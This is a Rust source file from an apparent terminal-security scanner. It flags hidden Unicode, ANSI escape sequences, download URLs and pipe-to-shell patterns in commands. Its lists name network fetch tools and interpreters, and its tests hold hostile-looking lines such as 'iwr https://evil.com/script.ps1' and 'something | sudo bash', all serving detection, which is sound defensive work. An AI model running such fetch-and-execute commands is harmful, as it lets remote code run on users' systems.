use once_cell::sync::Lazy;
use regex::Regex;
use crate::parse::{self, UrlLike};
use crate::tokenize::{self, Segment, ShellType};
/// Where the text being scanned came from; selects which tier-1
/// prescreen pattern set applies in [`tier1_scan`].
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Text about to be executed as a command line.
    Exec,
    /// Text pasted into the terminal.
    Paste,
    /// Content read from a file; always passes the tier-1 prefilter.
    FileScan,
}
// Regex fragments and extractor metadata emitted by the build script into
// $OUT_DIR/tier1_gen.rs (EXTRACTOR_IDS, TIER1_EXEC_PATTERN, TIER1_PASTE_PATTERN,
// fragment counts). `dead_code` is allowed because not every generated item
// is used by every build configuration.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
/// IDs of the build-generated tier-1 extractors (for diagnostics/telemetry).
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
// Tier-1 prescreen regexes, compiled lazily on first use. The patterns are
// produced by the build script, so a compile failure indicates a build-system
// bug — hence `expect` rather than error propagation.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
// Matches scheme URLs (http/https/ftp/ssh/git) and scp-style
// `user@host:path` references.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
/// Aggregate outcome of [`scan_bytes`]: one boolean per hazard class plus
/// per-occurrence findings in `details`.
pub struct ByteScanResult {
    // ESC-introduced sequences (CSI/OSC/APC/DCS) or a trailing ESC byte.
    pub has_ansi_escapes: bool,
    // C0 controls other than \n, \t, ESC, plus DEL and "attack" \r.
    pub has_control_chars: bool,
    // Bidirectional reordering controls (LRO/RLO, isolates, marks).
    pub has_bidi_controls: bool,
    // Zero-width characters (ZWSP/ZWNJ/ZWJ, non-leading BOM, etc.).
    pub has_zero_width: bool,
    // Input was not valid UTF-8 as a whole.
    pub has_invalid_utf8: bool,
    // U+E0000..U+E007F tag characters.
    pub has_unicode_tags: bool,
    // Variation selectors (U+FE00.. and U+E0100.. ranges).
    pub has_variation_selectors: bool,
    // Invisible math operators U+2061..U+2064.
    pub has_invisible_math_operators: bool,
    // Thin/hair/narrow no-break spaces.
    pub has_invisible_whitespace: bool,
    // One entry per detected occurrence, in input order.
    pub details: Vec<ByteFinding>,
}
/// A single hazardous byte/character found by [`scan_bytes`].
pub struct ByteFinding {
    // Byte offset into the scanned input.
    pub offset: usize,
    // The first byte at that offset (lead byte for multibyte characters).
    pub byte: u8,
    // Decoded scalar value, when the finding is a Unicode character.
    pub codepoint: Option<u32>,
    // Human-readable description of the hazard.
    pub description: String,
}
/// Cheap tier-1 prefilter: returns `true` when `input` warrants the more
/// expensive deep analysis. File content is always scanned (no prefilter).
pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
    match context {
        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
        ScanContext::FileScan => true,
    }
}
/// Scan raw bytes for terminal-spoofing hazards: ANSI escape sequences,
/// hostile control characters, invalid UTF-8, and invisible or reordering
/// Unicode (bidi controls, zero-width characters, tag characters,
/// variation selectors, invisible math operators, thin/narrow spaces).
///
/// `offset` values in the returned findings are byte offsets into `input`.
pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
    let mut result = ByteScanResult {
        has_ansi_escapes: false,
        has_control_chars: false,
        has_bidi_controls: false,
        has_zero_width: false,
        has_invalid_utf8: false,
        has_unicode_tags: false,
        has_variation_selectors: false,
        has_invisible_math_operators: false,
        has_invisible_whitespace: false,
        details: Vec::new(),
    };
    if std::str::from_utf8(input).is_err() {
        result.has_invalid_utf8 = true;
    }
    let len = input.len();
    let mut i = 0;
    while i < len {
        let b = input[i];
        if b == 0x1b {
            if i + 1 < len {
                let next = input[i + 1];
                // Only the two-byte sequence introducers are flagged.
                // NOTE(review): ESC followed by any other final (e.g. ESC c)
                // is currently not flagged at all — confirm this is intended.
                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
                    result.has_ansi_escapes = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: None,
                        description: match next {
                            b'[' => "CSI escape sequence",
                            b']' => "OSC escape sequence",
                            b'_' => "APC escape sequence",
                            b'P' => "DCS escape sequence",
                            _ => "escape sequence",
                        }
                        .to_string(),
                    });
                    i += 2;
                    continue;
                }
            } else {
                // ESC as the very last byte is suspicious on its own.
                result.has_ansi_escapes = true;
                result.details.push(ByteFinding {
                    offset: i,
                    byte: b,
                    codepoint: None,
                    description: "trailing escape byte".to_string(),
                });
            }
        }
        if b == b'\r' {
            // A CR is only hostile when not part of a CRLF pair: a lone
            // trailing CR or Windows line endings are benign, while a CR
            // followed by other text can visually overwrite the line.
            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
            if is_attack_cr {
                result.has_control_chars = true;
                result.details.push(ByteFinding {
                    offset: i,
                    byte: b,
                    codepoint: None,
                    description: format!("control character 0x{b:02x}"),
                });
            }
        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
            // Remaining C0 controls (BEL, VT, FF, ...) are always flagged;
            // ESC is excluded because it is handled above.
            result.has_control_chars = true;
            result.details.push(ByteFinding {
                offset: i,
                byte: b,
                codepoint: None,
                description: format!("control character 0x{b:02x}"),
            });
        }
        if b == 0x7F {
            result.has_control_chars = true;
            result.details.push(ByteFinding {
                offset: i,
                byte: b,
                codepoint: None,
                description: "control character 0x7f (DEL)".to_string(),
            });
        }
        if b >= 0xc0 {
            // Lead byte of a 2–4 byte UTF-8 sequence: decode just this one
            // scalar. Trying each candidate width succeeds exactly when the
            // slice is one complete character, so — unlike the previous
            // whole-window decode — the character is still recognized when
            // *later* bytes are invalid UTF-8 (e.g. a bidi override
            // immediately followed by a stray 0xFF byte).
            let remaining = &input[i..];
            let max_width = remaining.len().min(4);
            let decoded = (2..=max_width).find_map(|w| {
                std::str::from_utf8(&remaining[..w])
                    .ok()
                    .and_then(|s| s.chars().next())
            });
            if let Some(ch) = decoded {
                if is_bidi_control(ch) {
                    result.has_bidi_controls = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("bidi control U+{:04X}", ch as u32),
                    });
                }
                // A BOM at offset 0 is a legitimate byte-order mark; only
                // flag U+FEFF when it appears mid-stream.
                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
                    result.has_zero_width = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("zero-width character U+{:04X}", ch as u32),
                    });
                }
                if is_unicode_tag(ch) {
                    result.has_unicode_tags = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("unicode tag U+{:04X}", ch as u32),
                    });
                }
                if is_variation_selector(ch) {
                    result.has_variation_selectors = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("variation selector U+{:04X}", ch as u32),
                    });
                }
                if is_invisible_math_operator(ch) {
                    result.has_invisible_math_operators = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("invisible math operator U+{:04X}", ch as u32),
                    });
                }
                if is_invisible_whitespace(ch) {
                    result.has_invisible_whitespace = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("invisible whitespace U+{:04X}", ch as u32),
                    });
                }
                i += ch.len_utf8();
                continue;
            }
        }
        i += 1;
    }
    result
}
/// True for Unicode bidirectional-control characters (marks, embeddings,
/// overrides, and isolates) that can visually reorder surrounding text.
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{200E}' | '\u{200F}'           // LRM / RLM
            | '\u{202A}'..='\u{202E}'     // LRE, RLE, PDF, LRO, RLO
            | '\u{2066}'..='\u{2069}'     // LRI, RLI, FSI, PDI
    )
}
/// True for zero-width / invisible joining characters:
/// ZWSP, ZWNJ, ZWJ, BOM (ZWNBSP), CGJ, soft hyphen, word joiner.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 7] = [
        '\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}', '\u{034F}', '\u{00AD}', '\u{2060}',
    ];
    ZERO_WIDTH.contains(&ch)
}
/// True for the deprecated tag characters U+E0000..=U+E007F, which render
/// invisibly in terminals and can smuggle hidden text.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch, '\u{E0000}'..='\u{E007F}')
}
/// True for variation selectors: VS1..VS16 (U+FE00..=U+FE0F) and the
/// supplementary VS17..VS256 (U+E0100..=U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch, '\u{FE00}'..='\u{FE0F}' | '\u{E0100}'..='\u{E01EF}')
}
/// True for the invisible mathematical operators
/// U+2061 FUNCTION APPLICATION through U+2064 INVISIBLE PLUS.
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}'..='\u{2064}')
}
/// True for easily-overlooked thin spaces: THIN SPACE, HAIR SPACE, and
/// NARROW NO-BREAK SPACE.
fn is_invisible_whitespace(ch: char) -> bool {
    ['\u{2009}', '\u{200A}', '\u{202F}'].contains(&ch)
}
/// Tokenize `input` for the given shell and extract every URL-like
/// reference: explicit scheme URLs and scp-style refs anywhere, schemeless
/// `host/path` arguments when the segment is a sink, and docker/podman
/// image references.
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();
    for (seg_idx, segment) in segments.iter().enumerate() {
        let sink_context = is_sink_context(segment, &segments);
        let resolved = resolve_segment_command(segment);
        // Explicit URLs can appear in the command word or any argument.
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for arg in &segment.args {
            url_sources.push(arg.as_str());
        }
        // URLs smuggled in via leading env assignments (VAR=url cmd ...),
        // except proxy configuration variables which are not destinations.
        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
            if ignores_env_assignment_url(&name) {
                continue;
            }
            let clean = strip_quotes(&value);
            if !clean.is_empty() {
                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
            }
        }
        for source in &url_sources {
            push_urls_from_source(source, seg_idx, sink_context, &mut results);
        }
        // In sink contexts, also catch schemeless hosts like `evil.com/x`.
        // Docker commands are excluded here; image refs are handled below.
        let is_docker_cmd = resolved
            .as_ref()
            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
        if sink_context && !is_docker_cmd {
            if let Some(cmd) = resolved.as_ref() {
                for (arg_idx, arg) in cmd.args.iter().enumerate() {
                    // Skip output filenames and credentials (curl -o, wget -O, ...).
                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
                        continue;
                    }
                    let clean = strip_quotes(arg);
                    // scp/rsync `user@host` copy targets are not URLs.
                    if is_remote_copy_target(&cmd.name, &clean) {
                        continue;
                    }
                    // Only when URL_REGEX did not already claim this token.
                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                        results.push(ExtractedUrl {
                            raw: clean.clone(),
                            parsed: UrlLike::SchemelessHostPath {
                                host: extract_host_from_schemeless(&clean),
                                path: extract_path_from_schemeless(&clean),
                            },
                            segment_index: seg_idx,
                            in_sink_context: true,
                        });
                    }
                }
            }
        }
        // Docker/podman/nerdctl image references: `build -t/--tag`,
        // `image <subcmd>`, and `pull`/`run`/`create`.
        if let Some(cmd) = resolved.as_ref() {
            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = cmd.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // Walk args for the tag in all three spellings:
                        // `-t name`, `-tname`, `--tag=name`.
                        let mut i = 1;
                        while i < cmd.args.len() {
                            let arg = strip_quotes(&cmd.args[i]);
                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
                                let tag_val = strip_quotes(&cmd.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                // Combined short form: -tname
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        if let Some(image_subcmd) = cmd.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }
    results
}
/// A URL-like reference found by [`extract_urls`].
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    // The matched text exactly as it appeared (after quote stripping).
    pub raw: String,
    // Structured interpretation of `raw`.
    pub parsed: UrlLike,
    // Index of the shell segment the reference was found in.
    pub segment_index: usize,
    // True when the segment fetches/executes remote content (see is_sink_context).
    pub in_sink_context: bool,
}
/// Docker/podman/nerdctl flags whose *next* argument is a value, so that
/// value must not be mistaken for the image reference.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform", "--format", "--filter", "-f", "--label", "-l", "--name",
    "--hostname", "--user", "-u", "--workdir", "-w", "--network", "--net",
    "--env", "-e", "--env-file", "--publish", "-p", "--expose", "--volume",
    "-v", "--mount", "--add-host", "--device", "--entrypoint", "--log-driver",
    "--log-opt", "--restart", "--runtime", "--cpus", "--cpu-shares",
    "--cpu-quota", "--memory", "--memory-reservation", "--memory-swap",
    "--shm-size", "--ulimit", "--security-opt", "--sysctl", "--tmpfs",
    "--gpus", "--ipc", "--pid", "--userns", "--cgroupns",
];
/// Short flags whose value may be glued on directly (e.g. `-p80:80`).
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
/// Find the first positional (non-flag) argument and record it as a docker
/// image reference; stops after that argument.
fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
    let mut skip_value = false;
    let mut past_options = false;
    for raw_arg in args {
        if skip_value {
            // Previous flag consumed this argument as its value.
            skip_value = false;
            continue;
        }
        let clean = strip_quotes(raw_arg);
        if clean == "--" {
            past_options = true;
            continue;
        }
        if !past_options && clean.starts_with('-') {
            if clean.starts_with("--") && clean.contains('=') {
                // `--flag=value` carries its value inline; nothing to skip.
                continue;
            }
            if DOCKER_VALUE_FLAGS.contains(&clean.as_str()) {
                // Flag whose value is the next argument.
                skip_value = true;
            } else if DOCKER_VALUE_PREFIXES
                .iter()
                .any(|p| clean.starts_with(p) && clean.len() > p.len())
            {
                // Combined short form like `-p80:80`: value is inline.
            }
            continue;
        }
        // First positional argument: treat as the image unless it is a
        // URL, a build-context path (`.`/`..`), or stdin (`-`).
        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
            let parsed = parse::parse_docker_ref(&clean);
            results.push(ExtractedUrl {
                raw: clean,
                parsed,
                segment_index: seg_idx,
                in_sink_context: true,
            });
        }
        break;
    }
}
/// A command after unwrapping wrapper programs (`env`, `command`, `time`,
/// `tirith`): the lowercased base name plus the arguments that follow it.
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
    // Lowercased final path component of the command word.
    name: String,
    // Arguments positioned after the resolved command word.
    args: &'a [String],
}
/// Append one `ExtractedUrl` to `results` for every URL-like match in
/// `source`, tagged with the given segment index and sink flag.
fn push_urls_from_source(
    source: &str,
    segment_index: usize,
    in_sink_context: bool,
    results: &mut Vec<ExtractedUrl>,
) {
    results.extend(URL_REGEX.find_iter(source).map(|mat| {
        let raw = mat.as_str().to_string();
        let parsed = parse::parse_url(&raw);
        ExtractedUrl {
            raw,
            parsed,
            segment_index,
            in_sink_context,
        }
    }));
}
/// True when an env assignment's URL value is proxy configuration
/// (`HTTP_PROXY`, `NO_PROXY`, ...) rather than a download destination.
fn ignores_env_assignment_url(name: &str) -> bool {
    // "NO_PROXY" itself ends in "_PROXY", so one suffix test covers every
    // proxy variable (the previous explicit NO_PROXY check was redundant).
    name.to_ascii_uppercase().ends_with("_PROXY")
}
/// Does this long `env(1)` flag consume a separate value argument
/// (when not written in `--flag=value` form)?
fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = match flag.split_once('=') {
        Some((name, _)) => name,
        None => flag,
    };
    matches!(name, "--unset" | "--chdir" | "--split-string")
}
/// Lowercased final path component of a (possibly quoted) command word,
/// handling both `/` and `\` separators.
fn command_base_name(raw: &str) -> String {
    let clean = strip_quotes(raw);
    let base = clean.rsplit(['/', '\\']).next().unwrap_or(clean.as_str());
    base.to_lowercase()
}
/// Resolve a tokenized segment to its effective command, unwrapping any
/// wrapper programs; `None` when the segment has no command word.
fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
    resolve_named_command(segment.command.as_deref()?, &segment.args)
}
/// Resolve a command word, delegating to the matching wrapper resolver for
/// `env`, `command`, `time`, and `tirith`; everything else is returned as-is.
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
    let name = command_base_name(command);
    if name == "env" {
        resolve_env_command(args)
    } else if name == "command" {
        resolve_command_wrapper(args)
    } else if name == "time" {
        resolve_time_wrapper(args)
    } else if name == "tirith" {
        resolve_tirith_command(args)
    } else {
        Some(ResolvedCommand { name, args })
    }
}
/// Unwrap `env [VAR=val ...] [flags] cmd ...` and resolve the wrapped command.
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut i = 0;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if clean == "--" {
            i += 1;
            break;
        }
        // VAR=value assignments may precede the command word.
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if clean.starts_with('-') {
            if clean.starts_with("--") {
                // Some long flags consume the next argument as their value
                // unless the value is attached with `=`.
                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
                    i += 2;
                } else {
                    i += 1;
                }
                continue;
            }
            // Short flags that take a separate value argument.
            if clean == "-u" || clean == "-C" || clean == "-S" {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        // First non-assignment, non-flag word is the wrapped command.
        return resolve_named_command(&clean, &args[i + 1..]);
    }
    // After `--`: only assignments can still precede the command word.
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }
    None
}
/// Unwrap shell-builtin `command [options] cmd ...` and resolve `cmd`.
fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut idx = 0;
    for arg in args {
        let clean = strip_quotes(arg);
        if clean == "--" {
            idx += 1;
            break;
        }
        if !clean.starts_with('-') {
            // First non-flag word is the wrapped command.
            break;
        }
        idx += 1;
    }
    args.get(idx)
        .and_then(|arg| resolve_named_command(arg, &args[idx + 1..]))
}
/// Unwrap `time [options] cmd ...` and resolve `cmd`; `-f/--format` and
/// `-o/--output` consume the following argument as their value.
fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
    const VALUE_FLAGS: &[&str] = &["-f", "--format", "-o", "--output"];
    let mut idx = 0;
    while let Some(arg) = args.get(idx) {
        let clean = strip_quotes(arg);
        if clean == "--" {
            idx += 1;
            break;
        }
        if !clean.starts_with('-') {
            break;
        }
        idx += if VALUE_FLAGS.contains(&clean.as_str()) { 2 } else { 1 };
    }
    args.get(idx)
        .and_then(|arg| resolve_named_command(arg, &args[idx + 1..]))
}
/// Resolve `tirith <subcommand> ...`: `tirith run` becomes the synthetic
/// sink command "tirith-run"; anything else stays plain "tirith".
fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let subcommand = command_base_name(args.first()?);
    if subcommand == "run" {
        Some(ResolvedCommand {
            name: "tirith-run".to_string(),
            args: &args[1..],
        })
    } else {
        Some(ResolvedCommand {
            name: "tirith".to_string(),
            args,
        })
    }
}
/// Is this segment a "sink": a command that fetches/executes remote
/// content, or an interpreter being fed from a pipe?
///
/// The segment's command is resolved once and reused (the previous version
/// resolved it a second time for the pipe check; resolution is
/// deterministic, so the result is identical).
fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
    let Some(cmd) = resolve_segment_command(segment) else {
        return false;
    };
    // git is only a sink for network-touching subcommands.
    if cmd.name == "git" {
        return is_git_sink(cmd.args);
    }
    if is_source_command(&cmd.name) {
        return true;
    }
    // `... | bash` style: an interpreter on the receiving end of a pipe.
    segment
        .preceding_separator
        .as_deref()
        .is_some_and(|sep| (sep == "|" || sep == "|&") && is_interpreter(&cmd.name))
}
/// Commands that download or install remote content (network "sources").
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl", "wget", "http", "https", "xh", "fetch", "scp", "rsync",
        "docker", "podman", "nerdctl", "pip", "pip3", "npm", "npx", "yarn",
        "pnpm", "go", "cargo", "iwr", "irm", "invoke-webrequest",
        "invoke-restmethod", "tirith-run",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
/// For scp/rsync only: a bare `user@host` (no path, no colon) is a copy
/// *target*, not a URL worth flagging.
fn is_remote_copy_target(cmd: &str, arg: &str) -> bool {
    if cmd != "scp" && cmd != "rsync" {
        return false;
    }
    match arg.split_once('@') {
        Some((user, host)) => !user.contains(':') && !host.contains('/') && !host.contains(':'),
        None => false,
    }
}
/// Is this `git` invocation one that contacts a remote?
/// The first non-flag argument is taken as the subcommand.
fn is_git_sink(args: &[String]) -> bool {
    args.iter()
        .map(|arg| strip_quotes(arg))
        .find(|clean| !clean.starts_with('-'))
        .is_some_and(|sub| {
            matches!(
                sub.as_str(),
                "clone" | "fetch" | "pull" | "submodule" | "remote"
            )
        })
}
/// Shells and script interpreters that will execute piped-in text.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh", "bash", "zsh", "dash", "ksh", "python", "python3", "node",
        "perl", "ruby", "php", "iex", "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
/// Is `args[arg_index]` the value of an output-file or credential flag
/// (and therefore not a download destination) for the given command?
fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
    let cmd_lower = cmd.to_lowercase();
    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
    // Per command: flags whose *next* argument is the value, and
    // `--flag=value` prefixes that carry the value inline.
    let (prev_flags, inline_prefixes): (&[&str], &[&str]) = match cmd_base {
        "curl" => (
            &["-o", "--output", "-u", "--user", "-U", "--proxy-user"],
            &["--output=", "--user=", "--proxy-user="],
        ),
        "wget" => (
            &[
                "-O", "--output-document", "--user", "--password", "--http-user",
                "--http-password", "--ftp-user", "--ftp-password", "--proxy-user",
                "--proxy-password",
            ],
            &[
                "--output-document=", "--user=", "--password=", "--http-user=",
                "--http-password=", "--ftp-user=", "--ftp-password=",
                "--proxy-user=", "--proxy-password=",
            ],
        ),
        "http" | "https" | "xh" => (&["-a", "--auth"], &["--auth="]),
        _ => return false,
    };
    if arg_index > 0 {
        let prev = strip_quotes(&args[arg_index - 1]);
        if prev_flags.contains(&prev.as_str()) {
            return true;
        }
    }
    let current = strip_quotes(&args[arg_index]);
    // Combined short output forms: curl `-ofile`, wget `-Ofile`.
    let combined_short = match cmd_base {
        "curl" => "-o",
        "wget" => "-O",
        _ => "",
    };
    if !combined_short.is_empty()
        && current.starts_with(combined_short)
        && current.len() > 2
        && !current.starts_with("--")
    {
        return true;
    }
    inline_prefixes.iter().any(|p| current.starts_with(p))
}
/// Trim surrounding whitespace, then remove one matching pair of double or
/// single quotes if the value is fully enclosed (length >= 2).
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    for quote in ['"', '\''] {
        // strip_prefix + strip_suffix only both succeed when the string is
        // at least two characters and starts AND ends with the same quote.
        if let Some(inner) = trimmed
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote))
        {
            return inner.to_string();
        }
    }
    trimmed.to_string()
}
/// Heuristic: does `s` look like a bare `host/path` URL written without a
/// scheme (e.g. `evil.com/payload`)?
fn looks_like_schemeless_host(s: &str) -> bool {
    // Flags, dotfiles, and dot-free tokens can never be hosts.
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }
    // A real path component (more than a bare trailing "/") is strong
    // evidence of a URL even when the "TLD" overlaps a file extension.
    let has_meaningful_path = s.find('/').is_some_and(|idx| {
        let after_slash = &s[idx + 1..];
        !after_slash.is_empty() && after_slash != "/"
    });
    if !has_meaningful_path {
        // Without a path, a token ending in a well-known file extension is
        // treated as a local filename, not a host (this covers
        // TLD-overlapping extensions such as .zip and .sh).
        const FILE_EXTS: &[&str] = &[
            ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h",
            ".txt", ".md", ".json", ".yaml", ".yml", ".xml", ".html", ".css",
            ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip", ".gz", ".bz2",
            ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so",
            ".log", ".conf", ".cfg", ".ini", ".toml", ".png", ".jpg",
            ".jpeg", ".gif", ".bmp", ".ico", ".tiff", ".tif", ".pdf", ".csv",
            ".mp3", ".mp4", ".wav", ".avi", ".mkv", ".flac", ".ogg", ".webm",
            ".ttf", ".otf", ".woff", ".woff2", ".docx", ".xlsx", ".pptx",
            ".sqlite", ".lock", ".example", ".local", ".bak", ".tmp", ".swp",
            ".orig", ".patch", ".diff", ".map", ".env", ".sample", ".dist",
            ".editorconfig",
        ];
        let host_lower = host_part.to_lowercase();
        if FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext)) {
            return false;
        }
    }
    // Require a plausible, purely alphabetic TLD of 2..=63 characters.
    // (host_part is guaranteed to contain '.', so there are >= 2 labels.)
    let tld = host_part.rsplit('.').next().unwrap_or("");
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
/// Host portion of a schemeless URL: everything before the first `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.split_once('/') {
        Some((host, _)) => host.to_string(),
        None => s.to_string(),
    }
}
/// Path portion of a schemeless URL: from the first `/` (inclusive) to the
/// end; empty string when there is no `/`.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |idx| s[idx..].to_string())
}
#[cfg(test)]
mod tests {
    use super::*;

    // --- tier-1 prescreen (generated patterns) ---------------------------

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }
    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }
    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }
    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
